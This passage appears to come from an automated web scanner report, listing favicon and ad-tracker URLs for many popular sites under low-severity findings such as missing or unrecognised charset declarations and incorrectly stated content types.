24.425. http://www.imesh.com/favicon.ico

24.426. http://www.in.gov/favicon.ico

24.427. http://www.inbox.com/favicon.ico

24.428. http://www.inc.com/favicon.ico

24.429. http://www.indeed.com/favicon.ico

24.430. http://www.indiatimes.com/favicon.ico

24.431. http://www.info.com/favicon.ico

24.432. http://www.infoplease.com/favicon.ico

24.433. http://www.infowars.com/favicon.ico

24.434. http://www.ingdirect.com/favicon.ico

24.435. http://www.insiderpages.com/favicon.ico

24.436. http://www.instructables.com/favicon.ico

24.437. http://www.intel.com/favicon.ico

24.438. http://www.intellicast.com/favicon.ico

24.439. http://www.intuit.com/favicon.ico

24.440. http://www.iobit.com/favicon.ico

24.441. http://www.ioffer.com/favicon.ico

24.442. http://www.irs.gov/favicon.ico

24.443. http://www.issuu.com/favicon.ico

24.444. http://www.istockphoto.com/favicon.ico

24.445. http://www.iwin.com/favicon.ico

24.446. http://www.jcpenney.com/favicon.ico

24.447. http://www.jcwhitney.com/favicon.ico

24.448. http://www.jihadwatch.org/favicon.ico

24.449. http://www.joann.com/favicon.ico

24.450. http://www.job.com/favicon.ico

24.451. http://www.jobsonline.net/favicon.ico

24.452. http://www.jstor.org/favicon.ico

24.453. http://www.jtv.com/favicon.ico

24.454. http://www.justanswer.com/favicon.ico

24.455. http://www.justin.tv/favicon.ico

24.456. http://www.justluxe.com/favicon.ico

24.457. http://www.kaboodle.com/favicon.ico

24.458. http://www.kaboose.com/favicon.ico

24.459. http://www.kaspersky.com/favicon.ico

24.460. http://www.kayak.com/favicon.ico

24.461. http://www.kazaa.com/favicon.ico

24.462. http://www.kbb.com/favicon.ico

24.463. http://www.kcom.com/

24.464. http://www.kenexa.com/favicon.ico

24.465. http://www.killerstartups.com/favicon.ico

24.466. http://www.king.com/favicon.ico

24.467. http://www.kmart.com/favicon.ico

24.468. http://www.kodak.com/favicon.ico

24.469. http://www.kodakgallery.com/favicon.ico

24.470. http://www.kraftrecipes.com/favicon.ico

24.471. http://www.krillion.com/favicon.ico

24.472. http://www.lanebryant.com/favicon.ico

24.473. http://www.last.fm/favicon.ico

24.474. http://www.latimes.com/favicon.ico

24.475. http://www.legacy.com/favicon.ico

24.476. http://www.letssingit.com/favicon.ico

24.477. http://www.levi.com/favicon.ico

24.478. http://www.lg.com/favicon.ico

24.479. http://www.life123.com/favicon.ico

24.480. http://www.lifescript.com/favicon.ico

24.481. http://www.lijit.com/favicon.ico

24.482. http://www.like.com/favicon.ico

24.483. http://www.lingospot.com/favicon.ico

24.484. http://www.linkedin.com/favicon.ico

24.485. http://www.liutilities.com/favicon.ico

24.486. http://www.livecams.com/favicon.ico

24.487. http://www.livejournal.com/favicon.ico

24.488. http://www.livenation.com/favicon.ico

24.489. http://www.llbean.com/favicon.ico

24.490. http://www.loc.gov/favicon.ico

24.491. http://www.local.com/favicon.ico

24.492. http://www.localguides.com/favicon.ico

24.493. http://www.localpages.com/favicon.ico

24.494. http://www.lowermybills.com/favicon.ico

24.495. http://www.lowes.com/favicon.ico

24.496. http://www.lowfares.com/favicon.ico

24.497. http://www.lyrics007.com/favicon.ico

24.498. http://www.lyricsmode.com/favicon.ico

24.499. http://www.macraesbluebook.com/favicon.ico

24.500. http://www.macrumors.com/favicon.ico

24.501. http://www.macys.com/favicon.ico

24.502. http://www.made-in-china.com/favicon.ico

24.503. http://www.mail.com/favicon.ico

24.504. http://www.mainstreet.com/favicon.ico

24.505. http://www.manualsonline.com/favicon.ico

24.506. http://www.mapquest.com/favicon.ico

24.507. http://www.mapsofworld.com/favicon.ico

24.508. http://www.marriott.com/favicon.ico

24.509. http://www.marthastewart.com/favicon.ico

24.510. http://www.marykay.com/favicon.ico

24.511. http://www.mastercard.com/favicon.ico

24.512. http://www.match.com/favicon.ico

24.513. http://www.mate1.net/favicon.ico

24.514. http://www.maxim.com/favicon.ico

24.515. http://www.mayoclinic.com/favicon.ico

24.516. http://www.mcafee.com/favicon.ico

24.517. http://www.medcohealth.com/favicon.ico

24.518. http://www.mediaite.com/favicon.ico

24.519. http://www.medicalnewstoday.com/favicon.ico

24.520. http://www.medicare.gov/favicon.ico

24.521. http://www.medscape.com/favicon.ico

24.522. http://www.meebo.com/favicon.ico

24.523. http://www.meetlocals.com/favicon.ico

24.524. http://www.meetup.com/favicon.ico

24.525. http://www.megaupload.com/favicon.ico

24.526. http://www.menshealth.com/favicon.ico

24.527. http://www.menuism.com/favicon.ico

24.528. http://www.menupages.com/favicon.ico

24.529. http://www.merchantcircle.com/favicon.ico

24.530. http://www.merck.com/favicon.ico

24.531. http://www.mercola.com/favicon.ico

24.532. http://www.metacafe.com/favicon.ico

24.533. http://www.metafilter.com/favicon.ico

24.534. http://www.metrolyrics.com/favicon.ico

24.535. http://www.metromix.com/favicon.ico

24.536. http://www.metropcs.com/favicon.ico

24.537. http://www.mgid.com/favicon.ico

24.538. http://www.miamiherald.com/favicon.ico

24.539. http://www.michaels.com/favicon.ico

24.540. http://www.michigan.gov/favicon.ico

24.541. http://www.microsofttranslator.com/favicon.ico

24.542. http://www.military.com/favicon.ico

24.543. http://www.mindjolt.com/favicon.ico

24.544. http://www.miracleworkers.com/favicon.ico

24.545. http://www.mlb.com/favicon.ico

24.546. http://www.mlive.com/favicon.ico

24.547. http://www.mocospace.com/favicon.ico

24.548. http://www.modelmayhem.com/favicon.ico

24.549. http://www.momswhothink.com/favicon.ico

24.550. http://www.moviesunlimited.com/favicon.ico

24.551. http://www.movietickets.com/favicon.ico

24.552. http://www.mozilla.com/favicon.ico

24.553. http://www.mp3lyrics.org/favicon.ico

24.554. http://www.mp3raid.com/favicon.ico

24.555. http://www.mrmovietimes.com/favicon.ico

24.556. http://www.msnbc.com/favicon.ico

24.557. http://www.mtv.com/favicon.ico

24.558. http://www.multimap.com/favicon.ico

24.559. http://www.musiciansfriend.com/favicon.ico

24.560. http://www.mybloglog.com/favicon.ico

24.561. http://www.mycokerewards.com/favicon.ico

24.562. http://www.mycricket.com/favicon.ico

24.563. http://www.myheritage.com/favicon.ico

24.564. http://www.mylife.com/favicon.ico

24.565. http://www.mylifetime.com/favicon.ico

24.566. http://www.mynewplace.com/favicon.ico

24.567. http://www.mysanantonio.com/favicon.ico

24.568. http://www.myspace.com/favicon.ico

24.569. http://www.mystart.com/favicon.ico

24.570. http://www.myxer.com/favicon.ico

24.571. http://www.myyearbook.com/favicon.ico

24.572. http://www.nadaguides.com/favicon.ico

24.573. http://www.nasa.gov/favicon.ico

24.574. http://www.nationalgeographic.com/favicon.ico

24.575. http://www.navy.mil/favicon.ico

24.576. http://www.nba.com/favicon.ico

24.577. http://www.nbc.com/favicon.ico

24.578. http://www.nbcnewyork.com/favicon.ico

24.579. http://www.ncm.com/favicon.ico

24.580. http://www.netflix.com/favicon.ico

24.581. http://www.netquote.com/favicon.ico

24.582. http://www.netsuite.com/favicon.ico

24.583. http://www.newegg.com/favicon.ico

24.584. http://www.newgrounds.com/favicon.ico

24.585. http://www.newport-news.com/favicon.ico

24.586. http://www.newsbucket.co.uk/favicon.ico

24.587. http://www.newser.com/favicon.ico

24.588. http://www.newsinc.com/favicon.ico

24.589. http://www.newsmax.com/favicon.ico

24.590. http://www.newsok.com/favicon.ico

24.591. http://www.newsvine.com/favicon.ico

24.592. http://www.newsweek.com/favicon.ico

24.593. http://www.nextel.com/favicon.ico

24.594. http://www.nextinsure.com/favicon.ico

24.595. http://www.nfl.com/favicon.ico

24.596. http://www.nhl.com/favicon.ico

24.597. http://www.nickjr.com/favicon.ico

24.598. http://www.nih.gov/favicon.ico

24.599. http://www.nike.com/favicon.ico

24.600. http://www.nintendo.com/favicon.ico

24.601. http://www.nola.com/favicon.ico

24.602. http://www.northerntool.com/favicon.ico

24.603. http://www.notebookreview.com/favicon.ico

24.604. http://www.npr.org/favicon.ico

24.605. http://www.nps.gov/favicon.ico

24.606. http://www.nwsource.com/favicon.ico

24.607. http://www.nydailynews.com/favicon.ico

24.608. http://www.nypost.com/favicon.ico

24.609. http://www.nytimes.com/favicon.ico

24.610. http://www.ocregister.com/favicon.ico

24.611. http://www.octonet.com/favicon.ico

24.612. http://www.officedepot.com/favicon.ico

24.613. http://www.officemax.com/favicon.ico

24.614. http://www.olivegarden.com/favicon.ico

24.615. http://www.onemanga.com/favicon.ico

24.616. http://www.onlywire.com/favicon.ico

24.617. http://www.oodle.com/favicon.ico

24.618. http://www.opentable.com/favicon.ico

24.619. http://www.opera.com/favicon.ico

24.620. http://www.opinionlab.com/favicon.ico

24.621. http://www.opm.gov/favicon.ico

24.622. http://www.opportunity.co/favicon.ico

24.623. http://www.oprah.com/favicon.ico

24.624. http://www.oracle.com/favicon.ico

24.625. http://www.orbitz.com/favicon.ico

24.626. http://www.orchardbank.com/favicon.ico

24.627. http://www.oregonlive.com/favicon.ico

24.628. http://www.orientaltrading.com/favicon.ico

24.629. http://www.ourstage.com/favicon.ico

24.630. http://www.overstock.com/favicon.ico

24.631. http://www.ovguide.com/favicon.ico

24.632. http://www.parenting.com/favicon.ico

24.633. http://www.parentsconnect.com/favicon.ico

24.634. http://www.partstore.com/favicon.ico

24.635. http://www.partypoker.com/favicon.ico

24.636. http://www.payless.com/favicon.ico

24.637. http://www.paypal.com/favicon.ico

24.638. http://www.pbs.org/favicon.ico

24.639. http://www.pchlotto.com/favicon.ico

24.640. http://www.pcmag.com/favicon.ico

24.641. http://www.pctools.com/favicon.ico

24.642. http://www.pcworld.com/favicon.ico

24.643. http://www.people.com/favicon.ico

24.644. http://www.peoplefinders.com/favicon.ico

24.645. http://www.peopleofwalmart.com/favicon.ico

24.646. http://www.peoplestylewatch.com/favicon.ico

24.647. http://www.petco.com/favicon.ico

24.648. http://www.petfinder.com/favicon.ico

24.649. http://www.petside.com/favicon.ico

24.650. http://www.petsmart.com/favicon.ico

24.651. http://www.pga.com/favicon.ico

24.652. http://www.pgatour.com/favicon.ico

24.653. http://www.philly.com/favicon.ico

24.654. http://www.phoenix.edu/favicon.ico

24.655. http://www.pickyourown.org/favicon.ico

24.656. http://www.picnik.com/favicon.ico

24.657. http://www.picsearch.com/favicon.ico

24.658. http://www.pillsbury.com/favicon.ico

24.659. http://www.pipl.com/favicon.ico

24.660. http://www.pittsburghlive.com/favicon.ico

24.661. http://www.playdom.com/favicon.ico

24.662. http://www.playfin.com/favicon.ico

24.663. http://www.pnc.com/favicon.ico

24.664. http://www.pogo.com/favicon.ico

24.665. http://www.pokerstars.com/favicon.ico

24.666. http://www.politico.com/favicon.ico

24.667. http://www.politicsdaily.com/favicon.ico

24.668. http://www.pollmonkey.com/favicon.ico

24.669. http://www.polyvore.com/favicon.ico

24.670. http://www.popcap.com/favicon.ico

24.671. http://www.poptropica.com/favicon.ico

24.672. http://www.popularscreensavers.com/favicon.ico

24.673. http://www.potterybarn.com/favicon.ico

24.674. http://www.pricegong.com/favicon.ico

24.675. http://www.primarygames.com/favicon.ico

24.676. http://www.prlog.org/favicon.ico

24.677. http://www.progressive.com/favicon.ico

24.678. http://www.pronto.com/favicon.ico

24.679. http://www.psu.edu/favicon.ico

24.680. http://www.publicrecords.com/favicon.ico

24.681. http://www.purdue.edu/favicon.ico

24.682. http://www.purplemath.com/favicon.ico

24.683. http://www.qualityhealth.com/favicon.ico

24.684. http://www.qualtrics.com/favicon.ico

24.685. http://www.questia.com/favicon.ico

24.686. http://www.quotegarden.com/favicon.ico

24.687. http://www.qwest.com/favicon.ico

24.688. http://www.radioshack.com/favicon.ico

24.689. http://www.rawtube.com/favicon.ico

24.690. http://www.reachlocal.com/favicon.ico

24.691. http://www.realage.com/favicon.ico

24.692. http://www.realsimple.com/favicon.ico

24.693. http://www.realtor.com/favicon.ico

24.694. http://www.redbox.com/favicon.ico

24.695. http://www.reddit.com/favicon.ico

24.696. http://www.redorbit.com/favicon.ico

24.697. http://www.reference.com/favicon.ico

24.698. http://www.regions.com/favicon.ico

24.699. http://www.registrydefender.com/favicon.ico

24.700. http://www.rei.com/favicon.ico

24.701. http://www.rent.com/favicon.ico

24.702. http://www.rentals.com/favicon.ico

24.703. http://www.reply.com/favicon.ico

24.704. http://www.retailmenot.com/favicon.ico

24.705. http://www.retrevo.com/favicon.ico

24.706. http://www.reuters.com/favicon.ico

24.707. http://www.ripoffreport.com/favicon.ico

24.708. http://www.riteaid.com/favicon.ico

24.709. http://www.rivals.com/favicon.ico

24.710. http://www.rollingstone.com/favicon.ico

24.711. http://www.rotoworld.com/favicon.ico

24.712. http://www.rottentomatoes.com/favicon.ico

24.713. http://www.roxwel.com/favicon.ico

24.714. http://www.rr.com/favicon.ico

24.715. http://www.rss2search.com/favicon.ico

24.716. http://www.runescape.com/favicon.ico

24.717. http://www.sacbee.com/favicon.ico

24.718. http://www.safeway.com/favicon.ico

24.719. http://www.salesforce.com/favicon.ico

24.720. http://www.salon.com/favicon.ico

24.721. http://www.samsclub.com/favicon.ico

24.722. http://www.savings.com/favicon.ico

24.723. http://www.sbnation.com/favicon.ico

24.724. http://www.scholastic.com/favicon.ico

24.725. http://www.sciencedaily.com/favicon.ico

24.726. http://www.scottrade.com/favicon.ico

24.727. http://www.scout.com/favicon.ico

24.728. http://www.scribd.com/favicon.ico

24.729. http://www.sears.com/favicon.ico

24.730. http://www.seattlepi.com/favicon.ico

24.731. http://www.sendspace.com/favicon.ico

24.732. http://www.seniorpeoplemeet.com/favicon.ico

24.733. http://www.sephora.com/favicon.ico

24.734. http://www.sfgate.com/favicon.ico

24.735. http://www.shangri-la.com/favicon.ico

24.736. http://www.sharebuilder.com/favicon.ico

24.737. http://www.shockwave.com/favicon.ico

24.738. http://www.shoebuy.com/favicon.ico

24.739. http://www.shop.com/favicon.ico

24.740. http://www.shopathome.com/favicon.ico

24.741. http://www.shopcompanion.com/favicon.ico

24.742. http://www.shopping.com/favicon.ico

24.743. http://www.shopstyle.com/favicon.ico

24.744. http://www.shopzilla.com/favicon.ico

24.745. http://www.shutterfly.com/favicon.ico

24.746. http://www.simon.com/favicon.ico

24.747. http://www.simplyhired.com/favicon.ico

24.748. http://www.sing365.com/favicon.ico

24.749. http://www.singlesnet.com/favicon.ico

24.750. http://www.sky.com/favicon.ico

24.751. http://www.skype.com/favicon.ico

24.752. http://www.slate.com/favicon.ico

24.753. http://www.slide.com/favicon.ico

24.754. http://www.slideshare.net/favicon.ico

24.755. http://www.smarter.com/favicon.ico

24.756. http://www.smilebox.com/favicon.ico

24.757. http://www.smugmug.com/favicon.ico

24.758. http://www.snagajob.com/favicon.ico

24.759. http://www.snapfish.com/favicon.ico

24.760. http://www.socialsecurity.gov/favicon.ico

24.761. http://www.sodahead.com/favicon.ico

24.762. http://www.soft32.com/favicon.ico

24.763. http://www.soft82.com/favicon.ico

24.764. http://www.softonic.com/favicon.ico

24.765. http://www.softpedia.com/favicon.ico

24.766. http://www.songlyrics.com/favicon.ico

24.767. http://www.sony.com/favicon.ico

24.768. http://www.southwest.com/favicon.ico

24.769. http://www.spanishdict.com/favicon.ico

24.770. http://www.sparkpeople.com/favicon.ico

24.771. http://www.spellingcity.com/favicon.ico

24.772. http://www.spike.com/favicon.ico

24.773. http://www.spokeo.com/favicon.ico

24.774. http://www.sportsauthority.com/favicon.ico

24.775. http://www.sportsmansguide.com/favicon.ico

24.776. http://www.sportsnetwork.com/favicon.ico

24.777. http://www.springerlink.com/favicon.ico

24.778. http://www.sprint.com/favicon.ico

24.779. http://www.squidoo.com/favicon.ico

24.780. http://www.ssa.gov/favicon.ico

24.781. http://www.stanford.edu/favicon.ico

24.782. http://www.star-telegram.com/favicon.ico

24.783. http://www.starpulse.com/favicon.ico

24.784. http://www.startribune.com/favicon.ico

24.785. http://www.state.gov/favicon.ico

24.786. http://www.state.tn.us/favicon.ico

24.787. http://www.statefarm.com/favicon.ico

24.788. http://www.stateuniversity.com/favicon.ico

24.789. http://www.steadyhealth.com/favicon.ico

24.790. http://www.stltoday.com/favicon.ico

24.791. http://www.stlyrics.com/favicon.ico

24.792. http://www.stumbleupon.com/favicon.ico

24.793. http://www.stylelist.com/favicon.ico

24.794. http://www.suite101.com/favicon.ico

24.795. http://www.suntimes.com/favicon.ico

24.796. http://www.superiorpics.com/favicon.ico

24.797. http://www.superpages.com/favicon.ico

24.798. http://www.symantec.com/favicon.ico

24.799. http://www.t-mobile.com/favicon.ico

24.800. http://www.tagged.com/favicon.ico

24.801. http://www.talkingpointsmemo.com/favicon.ico

24.802. http://www.tampabay.com/favicon.ico

24.803. http://www.target.com/favicon.ico

24.804. http://www.tastebook.com/favicon.ico

24.805. http://www.techbargains.com/favicon.ico

24.806. http://www.telegraph.co.uk/favicon.ico

24.807. http://www.terra.com/favicon.ico

24.808. http://www.textsfromlastnight.com/favicon.ico

24.809. http://www.theatlantic.com/favicon.ico

24.810. http://www.thedailybeast.com/favicon.ico

24.811. http://www.thedailyshow.com/favicon.ico

24.812. http://www.thedietsolutionprogram.com/favicon.ico

24.813. http://www.theepochtimes.com/favicon.ico

24.814. http://www.thefind.com/favicon.ico

24.815. http://www.thefreedictionary.com/favicon.ico

24.816. http://www.thefreelibrary.com/favicon.ico

24.817. http://www.thefrisky.com/favicon.ico

24.818. http://www.theglobeandmail.com/favicon.ico

24.819. http://www.theonion.com/favicon.ico

24.820. http://www.thesaurus.com/favicon.ico

24.821. http://www.thirdage.com/favicon.ico

24.822. http://www.thisis50.com/favicon.ico

24.823. http://www.thisoldhouse.com/favicon.ico

24.824. http://www.thomasnet.com/favicon.ico

24.825. http://www.thriftyfun.com/favicon.ico

24.826. http://www.ticketmaster.com/favicon.ico

24.827. http://www.tickets.com/favicon.ico

24.828. http://www.ticketsnow.com/favicon.ico

24.829. http://www.tigerdirect.com/favicon.ico

24.830. http://www.time.com/favicon.ico

24.831. http://www.timeanddate.com/favicon.ico

24.832. http://www.timewarnercable.com/favicon.ico

24.833. http://www.tinypic.com/favicon.ico

24.834. http://www.tmz.com/favicon.ico

24.835. http://www.tomshardware.com/favicon.ico

24.836. http://www.topix.com/favicon.ico

24.837. http://www.topix.net/favicon.ico

24.838. http://www.topshareware.com/favicon.ico

24.839. http://www.toptenreviews.com/favicon.ico

24.840. http://www.totalbeauty.com/favicon.ico

24.841. http://www.townhall.com/favicon.ico

24.842. http://www.toyota.com/favicon.ico

24.843. http://www.toysrus.com/favicon.ico

24.844. http://www.trafficrevenue.net/favicon.ico

24.845. http://www.trails.com/favicon.ico

24.846. http://www.travel-ticker.com/favicon.ico

24.847. http://www.travelocity.com/favicon.ico

24.848. http://www.travelpod.com/favicon.ico

24.849. http://www.travelzoo.com/favicon.ico

24.850. http://www.trendmicro.com/favicon.ico

24.851. http://www.tripadvisor.com/favicon.ico

24.852. http://www.tripzen.com/favicon.ico

24.853. http://www.true.com/favicon.ico

24.854. http://www.trulia.com/favicon.ico

24.855. http://www.truste.com/favicon.ico

24.856. http://www.tv.com/favicon.ico

24.857. http://www.tvguide.com/favicon.ico

24.858. http://www.tvtxtr.com/favicon.ico

24.859. http://www.ucomparehealthcare.com/favicon.ico

24.860. http://www.ufc.com/favicon.ico

24.861. http://www.uhaul.com/favicon.ico

24.862. http://www.ultimate-guitar.com/favicon.ico

24.863. http://www.umich.edu/favicon.ico

24.864. http://www.univision.com/favicon.ico

24.865. http://www.ups.com/favicon.ico

24.866. http://www.uptake.com/favicon.ico

24.867. http://www.urbanspoon.com/favicon.ico

24.868. http://www.usa-people-search.com/favicon.ico

24.869. http://www.usajobs.gov/favicon.ico

24.870. http://www.usatoday.com/favicon.ico

24.871. http://www.usbank.com/favicon.ico

24.872. http://www.use.com/favicon.ico

24.873. http://www.usgs.gov/favicon.ico

24.874. http://www.usmagazine.com/favicon.ico

24.875. http://www.usps.com/favicon.ico

24.876. http://www.ussearch.com/favicon.ico

24.877. http://www.ustream.tv/favicon.ico

24.878. http://www.utorrent.com/favicon.ico

24.879. http://www.va.gov/favicon.ico

24.880. http://www.vanguard.com/favicon.ico

24.881. http://www.vast.com/favicon.ico

24.882. http://www.veoh.com/favicon.ico

24.883. http://www.verisign.com/favicon.ico

24.884. http://www.vh1.com/favicon.ico

24.885. http://www.victoriassecret.com/favicon.ico

24.886. http://www.videobash.com/favicon.ico

24.887. http://www.videojug.com/favicon.ico

24.888. http://www.videosurf.com/favicon.ico

24.889. http://www.viewpoints.com/favicon.ico

24.890. http://www.villagevoice.com/favicon.ico

24.891. http://www.vimeo.com/favicon.ico

24.892. http://www.virginia.gov/favicon.ico

24.893. http://www.virginmobileusa.com/favicon.ico

24.894. http://www.vistaprint.com/favicon.ico

24.895. http://www.vitals.com/favicon.ico

24.896. http://www.vrbo.com/favicon.ico

24.897. http://www.walgreens.com/favicon.ico

24.898. http://www.walletpop.com/favicon.ico

24.899. http://www.walmart.com/favicon.ico

24.900. http://www.wapedia.mobi/favicon.ico

24.901. http://www.warnerbros.com/favicon.ico

24.902. http://www.washingtonpost.com/favicon.ico

24.903. http://www.weather.com/favicon.ico

24.904. http://www.weather.gov/favicon.ico

24.905. http://www.weatherbug.com/favicon.ico

24.906. http://www.webcrawler.com/favicon.ico

24.907. http://www.webgains.com/favicon.ico

24.908. http://www.webmd.com/favicon.ico

24.909. http://www.webring.org/favicon.ico

24.910. http://www.webs.com/favicon.ico

24.911. http://www.webshots.com/favicon.ico

24.912. http://www.weightwatchers.com/favicon.ico

24.913. http://www.wellness.com/favicon.ico

24.914. http://www.wellsfargo.com/favicon.ico

24.915. http://www.wendys.com/favicon.ico

24.916. http://www.wetpaint.com/favicon.ico

24.917. http://www.where2getit.com/favicon.ico

24.918. http://www.whitepages.com/favicon.ico

24.919. http://www.wikia.com/favicon.ico

24.920. http://www.wikimapia.org/favicon.ico

24.921. http://www.wikimedia.org/favicon.ico

24.922. http://www.wikio.com/favicon.ico

24.923. http://www.wimp.com/favicon.ico

24.924. http://www.winbuyer.com/favicon.ico

24.925. http://www.wired.com/favicon.ico

24.926. http://www.wisegeek.com/favicon.ico

24.927. http://www.wix.com/favicon.ico

24.928. http://www.womansday.com/favicon.ico

24.929. http://www.wonderhowto.com/favicon.ico

24.930. http://www.worldwinner.com/favicon.ico

24.931. http://www.worthpoint.com/favicon.ico

24.932. http://www.wowhead.com/favicon.ico

24.933. http://www.wowwiki.com/favicon.ico

24.934. http://www.wsbtv.com/favicon.ico

24.935. http://www.wunderground.com/favicon.ico

24.936. http://www.wwe.com/favicon.ico

24.937. http://www.xanga.com/favicon.ico

24.938. http://www.xe.com/favicon.ico

24.939. http://www.yakaz.com/favicon.ico

24.940. http://www.yallwire.com/favicon.ico

24.941. http://www.yardbarker.com/favicon.ico

24.942. http://www.yellow.com/favicon.ico

24.943. http://www.yellowbook.com/favicon.ico

24.944. http://www.yellowpages.com/favicon.ico

24.945. http://www.yelp.com/favicon.ico

24.946. http://www.yidio.com/favicon.ico

24.947. http://www.younghollywood.com/favicon.ico

24.948. http://www.yourdictionary.com/favicon.ico

24.949. http://www.yourfilehost.com/favicon.ico

24.950. http://www.yuku.com/favicon.ico

24.951. http://www.zabasearch.com/favicon.ico

24.952. http://www.zap2it.com/favicon.ico

24.953. http://www.zappos.com/favicon.ico

24.954. http://www.zazzle.com/favicon.ico

24.955. http://www.zillow.com/favicon.ico

24.956. http://www.zimbio.com/favicon.ico

24.957. http://www.ziprealty.com/favicon.ico

24.958. http://www.zmags.com/favicon.ico

24.959. http://www.zoosk.com/favicon.ico

24.960. http://www.zshare.net/favicon.ico

24.961. http://www.zvents.com/favicon.ico

24.962. http://www.zynga.com/favicon.ico

25. HTML does not specify charset

25.1. https://activresa-secure2.icor.fr/

25.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

25.3. http://fls.doubleclick.net/activityi

25.4. http://www.avast.com/favicon.ico

25.5. http://www.billsnitzer.com/favicon.ico

25.6. http://www.cheetahmail.com/favicon.ico

25.7. http://www.chinaontv.com/favicon.ico

25.8. http://www.citibank.com/favicon.ico

25.9. http://www.cobaltnitra.com/favicon.ico

25.10. http://www.coolmath.com/favicon.ico

25.11. http://www.coolmath4kids.com/favicon.ico

25.12. http://www.crocoads.com/favicon.ico

25.13. http://www.drudgereport.com/favicon.ico

25.14. http://www.dt00.net/favicon.ico

25.15. http://www.ehow.co.uk/favicon.ico

25.16. http://www.elyricsworld.com/favicon.ico

25.17. http://www.epinions.com/favicon.ico

25.18. http://www.fark.com/favicon.ico

25.19. http://www.firecue.com/favicon.ico

25.20. http://www.freedownloadscenter.com/favicon.ico

25.21. http://www.freeze.com/favicon.ico

25.22. http://www.hbo.com/favicon.ico

25.23. http://www.iloveindia.com/favicon.ico

25.24. http://www.intuit.com/favicon.ico

25.25. http://www.iwin.com/favicon.ico

25.26. http://www.lingospot.com/favicon.ico

25.27. http://www.moviesunlimited.com/favicon.ico

25.28. http://www.music-oasis.com/favicon.ico

25.29. http://www.olpinhoopes.com/favicon.ico

25.30. http://www.rmloader.com/favicon.ico

25.31. http://www.samsung.com/favicon.ico

25.32. http://www.socialsurveys.us/favicon.ico

25.33. http://www.sparkstudios.com/favicon.ico

25.34. http://www.springerlink.com/favicon.ico

25.35. http://www.swagbucks.com/favicon.ico

25.36. http://www.thegrids.info/favicon.ico

25.37. http://www.tidaltv.com/favicon.ico

25.38. http://www.trafficrevenue.net/favicon.ico

25.39. http://www.verisign.com/favicon.ico

25.40. http://www.verizon.net/favicon.ico

25.41. http://www.woot.com/favicon.ico

25.42. http://www.xe.com/favicon.ico

25.43. http://www.y8.com/favicon.ico

25.44. http://www.yfrog.com/favicon.ico

26. HTML uses unrecognised charset

27. Content type incorrectly stated

27.1. http://www.123greetings.com/favicon.ico

27.2. http://www.2wire.net/favicon.ico

27.3. http://www.43things.com/favicon.ico

27.4. http://www.6waves.com/favicon.ico

27.5. http://www.aa.com/favicon.ico

27.6. http://www.aarp.org/favicon.ico

27.7. http://www.ad4game.com/favicon.ico

27.8. http://www.alibaba.com/favicon.ico

27.9. http://www.alibris.com/favicon.ico

27.10. http://www.allbusiness.com/favicon.ico

27.11. http://www.allvoices.com/favicon.ico

27.12. http://www.alphadictionary.com/favicon.ico

27.13. http://www.americantowns.com/favicon.ico

27.14. http://www.andiesisle.com/favicon.ico

27.15. http://www.andkon.com/favicon.ico

27.16. http://www.apartmenthomeliving.com/favicon.ico

27.17. http://www.apartmentratings.com/favicon.ico

27.18. http://www.arizona.edu/favicon.ico

27.19. http://www.aroundme.com/favicon.ico

27.20. http://www.articlesbase.com/favicon.ico

27.21. http://www.ask.com/favicon.ico

27.22. http://www.astrology.com/favicon.ico

27.23. http://www.autozone.com/favicon.ico

27.24. http://www.avast.com/favicon.ico

27.25. http://www.babelgum.com/favicon.ico

27.26. http://www.bankofamerica.com/favicon.ico

27.27. http://www.beezid.com/favicon.ico

27.28. http://www.blucigs.com/favicon.ico

27.29. http://www.blurtit.com/favicon.ico

27.30. http://www.boingboing.net/favicon.ico

27.31. http://www.bravotv.com/favicon.ico

27.32. http://www.breitbart.com/favicon.ico

27.33. http://www.buzzillions.com/favicon.ico

27.34. http://www.cabelas.com/favicon.ico

27.35. http://www.caringbridge.org/favicon.ico

27.36. http://www.cbc.ca/favicon.ico

27.37. http://www.celebrity-gossip.net/favicon.ico

27.38. http://www.census.gov/favicon.ico

27.39. http://www.chilisemailclub.com/favicon.ico

27.40. http://www.chuckecheese.com/favicon.ico

27.41. http://www.cincinnati.com/favicon.ico

27.42. http://www.city-data.com/favicon.ico

27.43. http://www.clocklink.com/favicon.ico

27.44. http://www.clubpenguin.com/favicon.ico

27.45. http://www.cnsnews.com/favicon.ico

27.46. http://www.collegeboard.com/favicon.ico

27.47. http://www.collegeconfidential.com/favicon.ico

27.48. http://www.comedycentral.com/favicon.ico

27.49. http://www.complaintsboard.com/favicon.ico

27.50. http://www.contactmusic.com/favicon.ico

27.51. http://www.craigslist.ca/favicon.ico

27.52. http://www.craigslist.org/favicon.ico

27.53. http://www.craveonline.com/favicon.ico

27.54. http://www.cyberdefender.com/favicon.ico

27.55. http://www.datpiff.com/favicon.ico

27.56. http://www.denverpost.com/favicon.ico

27.57. http://www.detiva.com/favicon.ico

27.58. http://www.diablomedia.com/favicon.ico

27.59. http://www.directbuyvisitorpass.com/favicon.ico

27.60. http://www.doityourself.com/favicon.ico

27.61. http://www.dreamstime.com/favicon.ico

27.62. http://www.driverside.com/favicon.ico

27.63. http://www.eatingwell.com/favicon.ico

27.64. http://www.ebaumsworld.com/favicon.ico

27.65. http://www.economist.com/favicon.ico

27.66. http://www.ed.gov/favicon.ico

27.67. http://www.egotastic.com/favicon.ico

27.68. http://www.ehealthforum.com/favicon.ico

27.69. http://www.ehow.co.uk/favicon.ico

27.70. http://www.epicurious.com/favicon.ico

27.71. http://www.epinions.com/favicon.ico

27.72. http://www.examiner.com/favicon.ico

27.73. http://www.ezanga.com/favicon.ico

27.74. http://www.familybuilder.com/favicon.ico

27.75. http://www.fantage.com/favicon.ico

27.76. http://www.faqs.org/favicon.ico

27.77. http://www.fastcompany.com/favicon.ico

27.78. http://www.fetedoris.com/favicon.ico

27.79. http://www.filestube.com/favicon.ico

27.80. http://www.findagrave.com/favicon.ico

27.81. http://www.finishline.com/favicon.ico

27.82. http://www.flixster.com/favicon.ico

27.83. http://www.food.com/favicon.ico

27.84. http://www.fortunecity.com/favicon.ico

27.85. http://www.freecause.com/favicon.ico

27.86. http://www.freeonlinegames.com/favicon.ico

27.87. http://www.freeze.com/favicon.ico

27.88. http://www.freshdeals.com/favicon.ico

27.89. http://www.funbrain.com/favicon.ico

27.90. http://www.gamehouse.com/favicon.ico

27.91. http://www.gamevance.com/favicon.ico

27.92. http://www.gamewinners.com/favicon.ico

27.93. http://www.gardenweb.com/favicon.ico

27.94. http://www.genealogy.com/favicon.ico

27.95. http://www.gossipcenter.com/favicon.ico

